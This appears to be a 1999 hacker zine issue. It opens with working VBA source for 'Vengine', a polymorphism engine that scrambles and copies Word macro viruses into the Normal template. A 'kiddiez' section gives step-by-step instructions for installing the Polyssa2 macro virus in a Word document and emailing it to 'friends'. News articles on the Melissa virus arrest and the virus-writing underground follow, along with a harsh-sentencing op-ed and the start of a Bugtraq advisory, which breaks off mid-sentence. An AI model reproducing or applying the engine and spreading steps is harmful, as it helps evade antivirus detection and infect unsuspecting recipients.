Jk4tn(24) = "I6b" Jk4tn(25) = "Zo4ni" Jk4tn(26) = "Vc4b" Jk4tn(27) = "Ov1dd" Jk4tn(28) = "L5Z" ' T1b Jk4tn(29) = "Lq5a" Jk4tn(30) = "Lm2jv" Jk4tn(31) = "Rm4gU" Jk4tn(32) = "K0t" Jk4tn(33) = "Xy9ti" Jk4tn(34) = "C1x?" Jk4tn(35) = "Gp5Xr" Jk4tn(36) = "D7R" Jk4tn(37) = "Au1R" Jk4tn(38) = "T6e" Jk4tn(39) = "Qt3tq" Jk4tn(40) = "J2P" Jk4tn(41) = "Td7x1" Jk4tn(42) = "RV8Q1" Jk4tn(43) = "D1d" Jk4tn(44) = "B6r" Jk4tn(45) = "Qz3c" Jk4tn(46) = "Fg2c" Jk4tn(47) = "Ih0M" ' T1b Jk4tn(48) = "Wn2zR" Jk4tn(49) = "Gj5y" Jk4tn(50) = "Yt9qC" End Sub Private Sub Wc4vu(ID2Ki, H2f) ReDim NM9D(0) ReDim Jk4tn(0) ReDim XL2o(0) Dim Q6d As String For I = 1 To ID2Ki.CountOfLines Q6d = ID2Ki.Lines(I, 1) If Trim(Q6d) <> "" Then L5Z Q6d, 1 Next I E7m H2f.DeleteLines 1, H2f.CountOfLines H2f.AddFromString "" For I = 1 To ID2Ki.CountOfLines Q6d = ID2Ki.Lines(I, 1) If Trim(Q6d) <> "" Then To6i = "" L5Z Q6d, 2 If Rnd < 0.1 Then To6i = To6i + " ' " + "Qg1sh" H2f.InsertLines H2f.CountOfLines + 1, To6i End If Next I End Sub Private Sub Ov1dd(Ve7Fv As String, C5m As Integer) Ze6Fm = Left$(Ve7Fv, 1) = Chr$(34) And Right$(Ve7Fv, 1) = Chr$(34) And Len(Ve7Fv) > 2 ' T1b If Ze6Fm Then Ve7Fv = Mid$(Ve7Fv, 2, Len(Ve7Fv) - 2) Ac4G = UCase$(Left$(Ve7Fv, 1)) >= "A" And UCase$(Left$(Ve7Fv, 1)) <= "Z" Lq5a = UCase$(Right$(Ve7Fv, 1)) If C5m = 1 Then If Ac4G Then For X3J% = 1 To UBound(NM9D) If Ve7Fv = NM9D(X3J%) Then Exit Sub Next X3J% ReDim Preserve NM9D(UBound(NM9D) + 1) NM9D(UBound(NM9D)) = Ve7Fv End If Exit Sub End If If Ac4G Then For X3J% = 1 To UBound(Jk4tn) If Ve7Fv = Jk4tn(X3J%) Then Ve7Fv = XL2o(X3J%) If Lq5a < "A" Or Lq5a > "Z" Then Ve7Fv = Ve7Fv + Lq5a Exit For End If ' T1b Next X3J% End If If Ze6Fm Then Ve7Fv = Chr$(34) + Ve7Fv + Chr$(34) If To6i <> "" Then If Right$(To6i, 1) <> "." And Left$(Ve7Fv, 1) <> "." Then Ve7Fv = " " + Ve7Fv ' T1b End If To6i = To6i + Ve7Fv End Sub Private Sub E7m() P5R ReDim Preserve XL2o(UBound(Jk4tn)) For X3J% = 1 To UBound(XL2o) L1G: F6p = Int(Rnd * 3) + 3 Qz9yi = "" For Vs1fb% = 1 To F6p CI1j = Chr$(97 + Int(Rnd * 26)) If Vs1fb% = 1 Or Rnd > 0.8 Then CI1j = UCase$(CI1j) ' T1b If Vs1fb% = 1 + Int(F6p / 2) Then CI1j = Chr$(48 + Rnd * 9) Qz9yi = Qz9yi + CI1j Next Vs1fb% For Vs1fb% = 1 To UBound(NM9D) If Qz9yi = NM9D(Vs1fb%) Then GoTo L1G Next Vs1fb% For Vs1fb% = 1 To X3J% - 1 If Qz9yi = XL2o(Vs1fb%) Then GoTo L1G Next Vs1fb% XL2o(X3J%) = Qz9yi Next X3J% End Sub Private Sub L5Z(Q6d As String, C5m As Integer) Dim Ve7Fv As String Dim CI1j As String ' T1b Do Q6d = LTrim(Q6d) Zo4ni = False If Len(Q6d) = 0 Then Exit Do S4u% = 1 CI1j = UCase$(Left$(Q6d, 1)) I6b = (CI1j >= "A" And CI1j <= "Z") Or (CI1j >= "0" And CI1j <= "9") Do If S4u% > Len(Q6d) Then Exit Do CI1j = Mid$(Q6d, S4u%, 1) If CI1j = Chr$(34) Then If Zo4ni Then S4u% = S4u% + 1: Exit Do Zo4ni = True ' T1b End If If Not Zo4ni Then If I6b Then If CI1j = "$" Or CI1j = "%" Or CI1j = "&" Then S4u% = S4u% + 1: Exit Do If CI1j = "!" Or CI1j = "#" Then S4u% = S4u% + 1: Exit Do End If Vc4b = UCase$(CI1j) >= "A" And UCase$(CI1j) <= "Z" ' T1b Vc4b = Vc4b Or (CI1j >= "0" And CI1j <= "9") Or CI1j = "_" If I6b <> Vc4b Then Exit Do If CI1j < Chr$(33) Or CI1j > Chr$(127) Then Exit Do End If S4u% = S4u% + 1 Loop Ve7Fv = Left$(Q6d, S4u% - 1) Q6d = Right$(Q6d, Len(Q6d) - (S4u% - 1)) If Left$(Ve7Fv, 1) = "'" Or Ve7Fv = "Rem" Then Exit Do Ov1dd Ve7Fv, C5m Loop End Sub -=- Vengine.txt -=- ' Vengine - polymorphizer for MS-Word macro viruses ' Coded by VeggieTailz ' ' This engine can be used to polymorphize any MS-Word macro virus. ' ' The Vengine concept was inspired by Nick FitzGerald's asinine posting ' on BugTraq, dated 3/29/99 and archived at geek-girl.com. ' Private Zy7td() As String Private QC2cz() As String Private K1j() As String Private Nv4cl As String Private Sub Example() ' As a demo, we'll copy the current macros to the template. After running ' this example (make sure this is the ActiveDocument!), examine the MS-Word ' template. It will contain a scrambled (but still functional) version of ' this program. Set Source = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule Set Dest = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule ' The "Infect" sub copies the macros from "Source" to "Dest", scrambling ' them in the process. The contents of Dest are overwritten. Infect Source, Dest End Sub Private Sub InfectTable() ' This table stores the identifiers which will be scrambled. They can ' be any ordinary variable name (even names ending with a suffix like ' % or $). Make your choices carefully tho, as the substitutions ' will also be applied to string constants (otherwise the code below ' would not get updated). ReDim QC2cz(29) ' don't forget to set the array size! QC2cz(1) = "Infect" QC2cz(2) = "InfectTable" QC2cz(3) = "Zy7td" QC2cz(4) = "QC2cz" QC2cz(5) = "K1j" QC2cz(6) = "Nv4cl" QC2cz(7) = "Co6q" QC2cz(8) = "X3X" QC2cz(9) = "R0e" QC2cz(10) = "Tq4tl" QC2cz(11) = "G4u" QC2cz(12) = "To6dm" QC2cz(13) = "Rg4mp" QC2cz(14) = "I4h" QC2cz(15) = "I6w" QC2cz(16) = "Gy0u" QC2cz(17) = "S5l" QC2cz(18) = "T1g" QC2cz(19) = "T1b" QC2cz(20) = "Ba6Dk%" QC2cz(21) = "X1U%" QC2cz(22) = "C6E%" QC2cz(23) = "C6z%" QC2cz(24) = "X6q" QC2cz(25) = "XM2wj" QC2cz(26) = "Yx1h" QC2cz(27) = "Sh6k" QC2cz(28) = "T2w" QC2cz(29) = "Ky8c" ' [add your entries here!] End Sub Private Sub Infect(Co6q, X3X) ReDim Zy7td(0) ReDim QC2cz(0) ReDim K1j(0) Dim R0e As String For I = 1 To Co6q.CountOfLines R0e = Co6q.Lines(I, 1) If Trim(R0e) <> "" Then T2w R0e, 1 Next I Tq4tl X3X.DeleteLines 1, X3X.CountOfLines X3X.AddFromString "" For I = 1 To Co6q.CountOfLines R0e = Co6q.Lines(I, 1) If Trim(R0e) <> "" Then Nv4cl = "" T2w R0e, 2 If Rnd < 0.1 Then Nv4cl = Nv4cl + " ' " + "T1b" X3X.InsertLines X3X.CountOfLines + 1, Nv4cl End If Next I End Sub Private Sub Sh6k(To6dm As String, Rg4mp As Integer) G4u = Left$(To6dm, 1) = Chr$(34) And Right$(To6dm, 1) = Chr$(34) And Len(To6dm) > 2 If G4u Then To6dm = Mid$(To6dm, 2, Len(To6dm) - 2) I4h = UCase$(Left$(To6dm, 1)) >= "A" And UCase$(Left$(To6dm, 1)) <= "Z" Ky8c = UCase$(Right$(To6dm, 1)) If Rg4mp = 1 Then If I4h Then For Ba6Dk% = 1 To UBound(Zy7td) If To6dm = Zy7td(Ba6Dk%) Then Exit Sub Next Ba6Dk% ReDim Preserve Zy7td(UBound(Zy7td) + 1) Zy7td(UBound(Zy7td)) = To6dm End If Exit Sub End If If I4h Then For Ba6Dk% = 1 To UBound(QC2cz) If To6dm = QC2cz(Ba6Dk%) Then To6dm = K1j(Ba6Dk%) If Ky8c < "A" Or Ky8c > "Z" Then To6dm = To6dm + Ky8c Exit For End If Next Ba6Dk% End If If G4u Then To6dm = Chr$(34) + To6dm + Chr$(34) If Nv4cl <> "" Then If Right$(Nv4cl, 1) <> "." And Left$(To6dm, 1) <> "." Then To6dm = " " + To6dm End If Nv4cl = Nv4cl + To6dm End Sub Private Sub Tq4tl() InfectTable ReDim Preserve K1j(UBound(QC2cz)) For Ba6Dk% = 1 To UBound(K1j) I6w: Gy0u = Int(Rnd * 3) + 3 S5l = "" For X1U% = 1 To Gy0u T1g = Chr$(97 + Int(Rnd * 26)) If X1U% = 1 Or Rnd > 0.8 Then T1g = UCase$(T1g) If X1U% = 1 + Int(Gy0u / 2) Then T1g = Chr$(48 + Rnd * 9) S5l = S5l + T1g Next X1U% For X1U% = 1 To UBound(Zy7td) If S5l = Zy7td(X1U%) Then GoTo I6w Next X1U% For X1U% = 1 To Ba6Dk% - 1 If S5l = K1j(X1U%) Then GoTo I6w Next X1U% K1j(Ba6Dk%) = S5l Next Ba6Dk% End Sub Private Sub T2w(R0e As String, Rg4mp As Integer) Dim To6dm As String Dim T1g As String Do R0e = LTrim(R0e) XM2wj = False If Len(R0e) = 0 Then Exit Do C6E% = 1 T1g = UCase$(Left$(R0e, 1)) X6q = (T1g >= "A" And T1g <= "Z") Or (T1g >= "0" And T1g <= "9") Do If C6E% > Len(R0e) Then Exit Do T1g = Mid$(R0e, C6E%, 1) If T1g = Chr$(34) Then If XM2wj Then C6E% = C6E% + 1: Exit Do XM2wj = True End If If Not XM2wj Then If X6q Then If T1g = "$" Or T1g = "%" Or T1g = "&" Then C6E% = C6E% + 1: Exit Do If T1g = "!" Or T1g = "#" Then C6E% = C6E% + 1: Exit Do End If Yx1h = UCase$(T1g) >= "A" And UCase$(T1g) <= "Z" Yx1h = Yx1h Or (T1g >= "0" And T1g <= "9") Or T1g = "_" If X6q <> Yx1h Then Exit Do If T1g < Chr$(33) Or T1g > Chr$(127) Then Exit Do End If C6E% = C6E% + 1 Loop To6dm = Left$(R0e, C6E% - 1) R0e = Right$(R0e, Len(R0e) - (C6E% - 1)) If Left$(To6dm, 1) = "'" Or To6dm = "Rem" Then Exit Do Sh6k To6dm, Rg4mp Loop End Sub -0- kiddiez.txt -0- Okay, so you can't program even BASIC, and you just want a copy of the virus to play with. Here's how: 1. Open up Microsoft Word 2. Press ALT-F11, which will pop up the VBA editor 3. In the "Project" window, you'll see "Project (Document1)". 4. Find "Microsoft Word Objects", then "ThisDocument" under that. 5. Double-click on "ThisDocument". Delete any text that shows up in the editor (on the right-hand side). 6. Open Polyssa2.txt with Notepad. From the "Edit" menu, chose "Select All", followed by "Copy". 7. Go back to your "Microsoft Visual Basic" window, and click on the right-hand window again (below where it says "(General)" or something at the top). Then click "Paste". 8. Press ALT-Q to return to Microsoft Word. Save your new document. 9. E-mail it to all your "friends". 10. Pat yourself on the back; you have successfully followed directions at least once in your miserable little life. -VeggieTailz N.B; The original melissa code was included in last issue and won't be reprinted here, - Ed @HWA 18.1 [ISN] Virus camp split over melissa virus bust ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Sun, 4 Apr 1999 06:18:33 -0600 (MDT) From: mea culpa To: InfoSec News Subject: [ISN] Virus writers' community split by arrest Forwarded From: William Knowles NEW YORK (AP) [4.2.99] - The close-knit underground of computer virus creators split into two camps at the news that one of their own may have been arrested for releasing malicious Melissa. ``The whole community has really been shaken up by this,'' said B.K. Delong, who follows the virus scene. ``The first group is one that wants a better reputation. Then there's the community that wants to retaliate and come up with even more destructive viruses.'' Virus creators gather at the Virus Exchange Underground, a computer chat area where they swap ideas and gossip. Most are programmers interested in viruses and computer bugs. They often write viruses and swap them among themselves, Delong said. They refer to themselves as ``Black Hats,'' interested in doing damage, and ``White Hats.'' The Black Hats sometimes release viruses through e-mail or Usenet newsgroups. In a statement released on behalf of the VX Underground, as it's often called, the group warned the media and investigators not to quickly condemn the author of Melissa. ``Instead they should be more interested in the person who released the bug which caused the spread of the virus,'' said the statement, which was e-mailed to The Associated Press. Melissa was originally posted on two sex discussion groups a week ago Friday, according to an online search. The VX Underground said it was highly unlikely those two posts out of thousands could have led to Melissa's vicious cascade. ``However, once released others posted the Melissa source code to additional newsgroups, Web sites and listservs (mailing lists), which meant anyone could turn it into the virus and continue to spread it,'' the statement continued. David L. Smith, 30, of Aberdeen, N.J., was arrested Friday and charged with originating the destructive Melissa, which infected hundreds of thousands of computers and swamped hundreds of companies' e-mail systems. Computer experts used unique identification numbers embedded in Microsoft Word documents to trace Melissa back to a well-known virus writer who calls himself VicodinES. Rita Malley, spokeswoman for the New Jersey state attorney general's office said Smith was ``definitely not'' the person known by that handle. Instead, Smith took two viruses, one of which came from VicodinES, and combined them with another virus to create Melissa, she said. ``They (the Black Hat programmers) are looking for someone to blame,'' said Delong. They resent the treatment VicodinES supposedly received at the hands of the media, and they're rallying around their own. They said he is a really nice guy.'' -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 18.2 [ISN] The Anarchic Lure of Virus Writing ... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ NYTIMES; http://www.nytimes.com/library/tech/99/04/biztech/articles/03virus.html Link April 3, 1999 The Anarchic Lure of Virus Writing By MATT RICHTEL and JOHN MARKOFF In the world of cyberspace, the sport of virus writing has become the latter-day equivalent of the urge to write "Kilroy was here" on the wall of the school auditorium. And it is a hobby with a growing following. The emergence of the Melissa virus a week ago, and the announcement yesterday of an arrest in the case, underscores the growth on the Internet of a community of virus writers and collectors. They freely trade malicious code, combine efforts to best the work of antivirus researchers, and post their creations on the Internet for anyone to download and release into the wild. "It's like candy," said Sarah Gordon, an antivirus researcher for I.B.M. who spent five years researching the virus-writing subculture. "A child can get these, a 12-year-old can get these." She said it required little technical expertise to introduce a virus once it was obtained. "It's trivial," she said. "All you do is download it to a computer, click on it and there you go." As the computer has become ubiquitous, the image of the bad guy of the technology era, the bespectacled introvert who attacks computer networks by keystroke, has emerged. Within this category, there exists a subset of virus writers, a subculture within the subculture. The International Computer Security Association, an industry corporation based in Carlisle, Pa., estimated last year that there were 15,000 to 20,000 viruses in circulation, with 1,000 emerging each month. Only a small number are widely circulated, or "make it into the wild," in the industry vernacular. But their proliferation has given rise to a highly competitive industry of companies that seek out the latest strains and find and market software antidotes. Over the years, virus writing has been perceived as having less status in the hacker set than cracking into government and corporate computers. But virus writing appears to have become more attractive to hackers as publicity around viruses has grown, say computer buffs and executives at antivirus companies. One early group of virus writers, 40Hex, which published a magazine, emerged in the early 1990's, said Jeff Moss, the founder of Defcon, an annual gathering of the computer underground. "They were going to cause the downfall of civilization, but then they got bored after a while," Moss said. "There wasn't that much happening in virus writing," he added, "so the more motivated people went off to normal hacking." As opposed to hacking, which can demand a range of skill levels, virus writing traditionally attracted a more technically oriented set. Virus writers "are very much into super-down-and-dirty programming," Moss said. But in recent years, virus writing has experienced a resurgence, generally attracting a less technically adept group. Increasingly, simple templates are available for use in virus writing and breaking into computers, making the endeavor open to copycats and less adept programmers. In the underground, these copycats are known as script kiddies. In the world of virus writing, they are termed scripters, a name Ms. Gordon gave to them. Ms. Gordon said virus-writing enthusiasts had evolved from the late 80's. "It used to be a small group of people with these interests," she said. "With the advent of the Internet, the community has widened and accessibility of applications to young people has increased." That may have particular currency in the case of the Melissa virus. Some computer security experts have suggested that David L. Smith, the New Jersey man arrested in the case yesterday, cobbled together his own virus code with virus templates he found on the Web. Authorities in New Jersey said they did not believe that Smith is the virus writer known as VicodinES, whose handle has been linked in Internet postings with the creation and dissemination of Melissa. What is certain is that VicodinES, whoever he or she is, has a Web site that advocates the creation and use of viruses, and that Smith's name was found in several documents on that Web site dating back at least a year, said Richard Smith, an independent software developer in Cambridge, Mass., who is an amateur computer sleuth. The Web site, which was taken down on Tuesday night by Access Orlando, the Internet service provider in Orlando, Fla., where the Web server was situated, served as a bulletin board and downloading site for viruses. It contained commentary by the author who identified himself as VicodinES. But some virus writers contend that it is far too simplistic to characterize all virus writers as malicious. Some are attracted to virus writing because they want to deconstruct programming code, see how it works, and poke holes in it as an intellectual endeavor, said a longtime virus writer known as Attitude Adjuster. "The idea that all of us out here are malicious teen-agers is quite a fallacy," said Attitude Adjuster, who was contacted by E-mail and declined to give his real name. "There are those of us who still exist in the community who write viruses because it's fun. We don't give our viruses to the public and nobody gets hurt." -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 18.3 A shadowy bunch...Philly Inquirer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.phillynews.com/inquirer/99/Apr/04/front_page/VIRU04.htm Link In virus arrest, a glimpse of a shadowy bunch Across the country, young men are found sharing recipes for inflicting mayhem on computers. By David Cho INQUIRER SUBURBAN STAFF David L. Smith has been arrested and identified by investigators as the man who unleashed Melissa on the computer world, but finding the virus' original creators -- members of a society of young hackers cloaked behind aliases and trails of code -- will be substantially harder. These hackers are likely to be the source, computer experts say, of future, and perhaps more dangerous, viruses. And it is these virus creators -- some as young as 14 -- that the FBI is now pursuing in investigations spanning the country. One member of the virus-making community, through his Web site, provided Smith with the necessary information to create and distribute his virus, authorities said. The FBI confirmed that it is still investigating the Melissa virus case. It is following leads based on information gathered from small Internet companies in Florida and Tennessee, according to officials at those companies. Considered unwitting hosts to Web sites that contained recipes for viruses, the companies are not implicated in creating or spreading the viruses, authorities said. Smith, of Aberdeen, N.J., was arrested Thursday night. He was charged with releasing the virus, which affected the e-mail accounts of at least 100,000 computers in its first five days. America Online technicians, in cooperation with federal agents, tracked Smith to his Monmouth County home. Through his lawyer, Smith, 30, a freelance programmer, denied any wrongdoing. He was released on $100,000 bail. "The computer world is a world where people do things, experimental things, just about every day," said Smith's lawyer, Steven Altman. "Nothing he did, or intended to do, had a premeditated or wrongful intent." Altman described his client as "very upset, scared and nervous. This has been a horrible ordeal." Even while refusing to release Smith's computer pseudonym, authorities said he was not the man behind the pseudonym, VicodinES, who is believed to have created the virus that Melissa was based on. VicodinES, taken from the name of a narcotic painkiller, frequently appears in online chat rooms of the virus-writing community, which calls itself the Virus Exchange. The problem with catching virus makers is that they work in a clandestine corner of cyberspace, making them difficult to track in the real world. They do not trust outsiders to enter into their chat rooms and almost never reveal their true identities. They keep their chat rooms closed through several techniques, by hiding behind codes or by unleashing miniviruses that will shut out unwanted guests. One man who has the trust of virus-writing circles is B.K. Delong, a Web consultant based in Boston. From listening to online discussions, Delong said the Smith arrest had thrown the virus-making community into chaos. Closed-door meetings were held in online chat rooms that even Delong was not privy to. The Virus Exchange, Delong said, basically has two kinds of people -- those who simply enjoy creating and exchanging virus programs as a demonstration of their skills, and those who steal viruses and release them into the general population. Smith's arrest exacerbated that divide, Delong said. Some "spreaders" were so upset that they threatened to release viruses "that could pretty much destroy anything on your computer," Delong said. Melissa was relatively benign, they said, compared to the havoc they can wreak. The "good" side of the community, though, is trying to redeem its reputation, Delong said. In an unusual collective statement, members of the Virus Exchange community said that Smith might have created Melissa, but he alone could not have been responsible for its rapid spread. "The media and investigative authorities should not be so quick to condemn the author of the Melissa bug," the statement said. "Instead they should be more interested in the person who released the bug which caused the spread of the virus. VicodinES has initially been blamed for the creation and spread of the Melissa Virus when in fact, he was not at fault." Delong added that no one in the community knows for sure whether Smith is VicodinES. "It's really hard to tell. He may not be known in the community, but then again he may be very well known in it," he said. "It all depends on when we figure out his nickname." For investigators, breaking open the Melissa case had the effect of bringing at least one hacker -- an unidentified man in his 20s who lives near Kingsport, Tenn. -- to the attention of the FBI. Two months ago, that man asked a young local Internet company called Global Connection to host a Web site for him. Dennis Halsey, the CEO and vice president of Global Connection, said he did not think anything of the request at the time. In fact, Halsey did not require any formal application and never checked to see what the Web site was. Neither Halsey nor the FBI would release the man's name. The site turned out to be Codebreakers.org -- one of the main places that virus creators use to trade code. "We never imagined it to be something this big, believe me," said Halsey, who described the man as a computer wizard. Halsey, who is not implicated in the case, said he knew the man only because "it's a small town and everybody sort of knows each other." But Halsey thought it was inconceivable that such a young man could be the infamous VicodinES or another prominent virus maker. "I'm sure that he is not the one who wrote the virus," Halsey said. "I mean, this is a multinational organization, there are members everywhere. How could this young kid be involved?" Cary Nachenberg, the chief researcher at the Symantec antivirus research center in Cupertino, Calif., said virus-writing societies, such as Codebreakers and VLAD, often drew young men from the most unexpected places. "Typically they are all male, teens to mid-20s, computer literate and too much time on their hands," Nachenberg said. "But the good thing is as they grow up and find something else to do, they usually stop writing viruses." About the same time investigators were questioning Halsey in Tennessee, an FBI team in Orlando, Fla., was confiscating a computer server that supported SourceofKaos, a Web site authored by VicodinES. Investigators have said that Smith downloaded a virus from that site and then added his own touch to create Melissa. The server was operated by Roger Sibert, who rented it from a small Internet company called Access Orlando. Sibert, whose server was dedicated to freedom of speech and anti-Microsoft issues, does not know who VicodinES is, but said he had exchanged e-mail messages a couple of times. Sibert added that he was cooperating with investigators. Meanwhile, Alan McGinn, the president of Access Orlando, said the server computer was in the hands of federal agents who believed it had telling clues to the origins of SourceofKaos and the identity of the enigmatic VicodinES. http://www.phillynews.com/inquirer/99/Apr/04/front_page/VIRU04.htm @HWA 18.4 Very imflammatory article: "Hang Hackers Like Coin Clippers" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Story The National Post: Montreal, CANADA Wednesday, April 07, 1999 Hang hackers like coin clippers Christy McCormick National Post If one takes a utilitarian approach to sentencing, then hanging cyber bandits for launching computer viruses like Melissa, to disable e-mail will be useful in discouraging others. To many, executing hackers is like hanging coin clippers in the 18th century or horse thieves in the 19th. It seems such an over-reaction. Simply shearing a sliver of silver from a passing shilling doesn't seem rope-worthy. Nor, from today's perspective, does horse stealing. But knowledge hardens hearts. Coin clippers drove out good money from the market and threatened economic collapse in Britain. It had to be stopped and clippers were hanged briskly until it was. In the wild west of America, a man without a horse was a man without a living. In a land with little charity and less welfare, his livelihood and life were threatened. Culprits received corresponding severity. Callow geeks who threaten the world's e-mail and computer systems can be viewed benignly. High school hackers fiddling with macros on their own computers then prankishly sending them off into cyberspace seem like little more than boyish pranks. But just as the 18th-century coin clipper threatened economic chaos, and the horse thief caused dangerous economic distress to the individual, today's hacker, who produces crippling viruses, threatens the system upon which the democratic world depends. While detection and/or protection is desired to bring the problem to heel, savage penalties will do in the meantime. Such severity will at least separate the dilettante from the fellow who feels that wrecking the Internet is his calling, and thus will reduce the numbers in the field. Admittedly, we shall put some cute kids into jail for a very long time or have them extradited to parts of the world they damaged, probably parts that care less about their welfare than we do. Capital punishment may be a bit much, except in Texas, Florida, and Louisiana, but whatever severity can be meted out by any jurisdiction should be seriously considered wherever a hacker is convicted. Harsh penalties are the traditional response in societies that find arresting culprits difficult because of an inadequacy in policing. So until things improve on that front, and cyber crime becomes less of a menace, hard sentencing is an appropriate quick fix. Some think this old-fashioned, but old-fashioned society was no more bloody-minded than we are. The problem was inadequate policing and protection. It was nearly impossible to catch criminals in any number proportional to the crime rate in the days of the Bow Street Runner. That is why they made such examples of the criminals they did catch. Criminologists agree there is a co-relation between higher catch rates and leniency in sentencing. But as we wait for improved policing and/or protection, the natural -- and perfectly wholesome -- response is to be extraordinarily harsh on those involved in such crimes. We should also be quite uncaring about their youth and unheeding of all but the most extraordinary extenuating circumstances. The Duke of Wellington, commanding armies in the Peninsular War and later after Waterloo, hanged any soldier caught looting, even if he only took a chicken or a pig from a local farmer. The Iron Duke had little retributive feeling about this. There is a story about him promoting a looting private to corporal after the story the man told showed he was capable of fighting his way in a tight corner. But, in general, the duke was not easily charmed. He knew he had to stop the looting or it would spread and his army could not count on the good will of the population if he ever suffered a reverse and had to retreat over the same ground. (American forces attacking Quebec weren't so careful and grabbed every chicken and pig along the way. They suffered the horrors of Napoleon's retreat from Moscow, partly because the locals of Quebec and Maine hid everything from the retreating looters. It was a horror story that might have be prevented by a little judicious hanging early on.) While severity has limitations and should never be substituted for a quest for good detection and protection, it has a value and should be employed in the interim. If the West could overcome its fretting over exculpating features of particular crimes and deal with the problem with utilitarian insensitivity, it would end up having less harm done to the cyber citizen tomorrow by being more severe with the cyber bandit today. Christy McCormick is a Montreal journalist @HWA 18.5 Second victim, erh suspect fingered on Melissa virus in Europe... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ZDNet Story Did Smith author Melissa? Analyst claims to have found German virus author -- has alerted the FBI. By Luke Reiter, ZDTV April 8, 1999 12:12 AM PT David L. Smith is set to appear in a New Jersey courtroom at 10:30 a.m. PDT Thursday in connection with charges stemming from the Melissa virus outbreak. But now questions are being raised as to whether he is the actual author of the virus. Jonathan James, an 18-year-old virus analyst from Sweden who's been helping the FBI with its Melissa investigation, claims to have identified a second suspect who he believes was involved in the creation of Melissa. James won't say much about this other suspect, but he will say that the second suspect is a male virus writer living somewhere in Europe -- and that he has already told the FBI exactly where to find that suspect. James also says that this virus writer speaks German, or some language that's derived from German. Parts of the Melissa source code include words that appear to come from a Germanic language. "I studied his source code and compared it to the Melissa virus source code, and I can see several similarities that are quite striking, and this thing with the German or German-related variables," James said. Does that mean Smith, the 30-year-old programmer from Aberdeen, N.J., did not write Melissa? James says he doesn't know. According to James, it looks like Smith was involved in "posting" the virus, but that he may not be the actual author. Of course, not everyone agrees with James' analysis. Phar Lap Software President Richard Smith, who's also provided information to the FBI, says this new European connection may be nothing major. In fact, it might just be plagiarism. "The most simple explanation here is that the virus writer didn't know how to do e-mail from Word, and borrowed it from someone else," Smith said. "Just because some code was written in German doesn't mean that that person was involved in the actual Melissa virus. It looks more like that code was simply borrowed from them." Yet more info on Melissa including the legal ramifications can be found on ZDNet's cybercrime section. Related Stories Melissa Trail Leads to 'Ex' Virus Writer Site administrator says virus writer has gone into retirement, so why is his name at the center of the Melissa controversy? By Luke Reiter and Jim Louderback The administrator whose site houses a page that may belong to the creator of the Melissa virus told ZDTV that he has nothing to do with the virus, and that the potential creator "is in retirement." Roger Sibert, systems administrator for Source of Kaos, a site frequented by virus enthusiasts, said that site log files showed that VicodinES had not been active on the site for 30 days. Code written by VicodinES has been linked to the Melissa virus, which has run wild on the Net since appearing Friday. "Last I heard, he'd gone into retirement," Sibert told ZDTV Monday night. The FBI has not contacted Sibert, but the administrator said he would cooperate with the bureau fully if they do. "I'm not hiding anything," he said. Sibert said he and VicodinES have communicated through email and Internet Relay Chat forums. Sibert said he was impressed with VicodinES's code writing skills. "He's probably talented enough to do it (the Melissa virus)," he said. 'Going into retirement' Sibert said he last communicated with VicodinES between eight months a year ago, when VicodinES had requested that his page be made inactive, as he was going into retirement. The Melissa virus contains a unique number-- the Global Unique Identifier or GUID-- embedded in the header of an attached Microsoft Word file. That number points to the computer that created the Word document. ZDTV verified that the GUID number is the same as one contained in a virus called PSD2000.DOC, located on the site of a virus developer known as VicodinES. However, the unique computer ID is stored in a Word document only once-- when the document is created. Even if a document is copied to a new computer, and saved under a new name, the original GUID number does not change. As any programmer knows, it's a lot easier to create a program by building on the work done by someone else. And VicodinES admits on his site that he built PSD2000.DOC based on a virus called Shiver. Shiver is the work of a virus developer calling himself ALT-F11. ZDTV tracked down Shiver and checked its GUID, which also matched the one embedded in Melissa. In addition, another virus created by ALT-F11 (called Groovie2) also contains the same GUID as Shiver, Melissa and PSD2000. Because ALT-F11 claims to have written Groovie and Shiver, it's likely that the GUID in all those viruses maps to his workstation. A check of the other word macros created by VicodinES found that PSD2000.DOC was the only file with that GUID. All the others, which VicodinES claims he created, had a different GUID. Melissa related to Shiver? What does all this mean? Whoever wrote Melissa built the virus around a Word file created on the same machine as Shiver. Was this ALT-F11? Possibly, because Shiver and Melissa share the same GUID. However, because virus developers frequently build on the work of others, in the same way that VicodinES built on Shiver to create PSD2000.DOC, VicodinES could have written Melissa, as well. Other possibilities exist. Another virus developer could have built Melissa out of the core of Shiver, or another developer out of another virus created on the same machine as the core of Shiver. Finally, someone could have taken the PSD2000.DOC file and enhanced it into Melissa. Because VicodinES appears to be the first person to have created a Word 2000 macro virus, it could be that the virus creator built Melissa out of Vicodin's PSD2000.DOC virus. Who is ALT-F11? Our information is spotty, but ALT-F11 is a part of the self-styled "Alternative Virus Mafia." AVM Website @HWA 19.0 Various vulnerabilities (mostly Linux); ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ X-Persona: Return-Path: X-Hate: Where do you want to go to die? Message-ID: Date: Sun, 7 Mar 1999 01:41:25 +0100 Reply-To: Michal Zalewski Sender: Bugtraq List From: Michal Zalewski Subject: ipop3d (x2) / pine (x2) / Linux kernel (x2) / Midnight Commander (x2) To: BUGTRAQ@netspace.org ** Summary of reported vunerabilities ** 1. Overflow in CAC.Washington.EDU ipop3d 4.xx 2. Overflow in pine 4.xx (Linux) 3. Lockfile vunerability in pine 4.xx (Linux) 4. Lockfile vunerability in ipop3d 4.xx 5. Linux 2.x IPC vunerability 6. Linux 2.x mmap vunerability 7. Midnight Commander 4.x bugs (x2) ** DETAILS ** 1. Overflow in CAC.Washington.EDU ipop3d 4.xx 2. Overflow in pine 4.xx (Linux) Both programs, at least on Linux platform, have serious security hole. When data is read from so-called mailbox lock created in /tmp directory (this happens under certain conditions - please refer exploit code below), it's stored in _too_small_ 